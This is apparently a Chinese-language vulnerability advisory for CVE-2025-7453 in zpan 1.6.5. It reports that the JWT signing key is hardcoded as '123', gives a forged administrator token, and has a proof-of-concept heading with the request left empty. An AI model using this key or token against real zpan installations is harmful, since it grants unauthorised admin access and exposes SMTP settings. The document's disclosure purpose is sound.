关键信息 漏洞概述 漏洞类型: 硬编码JWT密钥 受影响版本: Saltbo/zpan 1.6.5 CVE编号: CVE-2025-7453 漏洞详情 问题描述: 系统使用硬编码的JWT密钥"123"进行令牌签名,导致攻击者可以伪造有效的认证令牌,绕过安全控制并获得未经授权的访问。 算法: HMAC-SHA512 (HS512) 硬编码密钥: "123" 示例管理员JWT令牌: eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJ6cGxhdFVzZXJzIiwiZXhwIjoxNzUyMTQwMTkxLCJpYXQiOjE3NTExMzUzOTEsImF1ZCI6InBvbGljbmluZyIsInNjb3BlcyI6WyJhZG1pbiJdLCJzdWIiOiIxIn0.8qZzaLJD5gXvV5LeF2sAraFHAA2PQNtCeeUDTDyvPKG3qv5axKLbJ-AeeAjWz3Y57_rr7avP4g POC (概念验证) 请求示例: 说明: 使用上述 可以访问任何管理员API端点,例如获取SMTP信息。